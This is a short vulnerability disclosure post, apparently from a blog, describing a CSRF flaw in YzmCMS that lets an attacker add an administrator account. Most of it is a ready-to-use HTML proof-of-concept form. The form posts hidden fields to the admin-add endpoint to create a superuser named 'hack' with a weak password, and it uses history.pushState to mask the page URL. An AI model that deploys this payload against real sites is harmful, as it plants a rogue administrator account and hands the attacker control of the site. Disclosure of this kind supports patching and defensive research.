yzmcms_csrf漏洞_add_admin

There is two CSRF vulnerability that can add the administrator account

After the administrator logged in,open the following one page.

POC:

<html>
   <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://YOUR HOST/index.php/admin/admin_manage/add.html" method="POST">
      <input type="hidden" name="adminname" value="hack" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="password2" value="123456" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="realname" value="" />
      <input type="hidden" name="roleid" value="1" />
      <input type="hidden" name="dosubmit" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

 

For example:

0

Related Posts

Comments

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据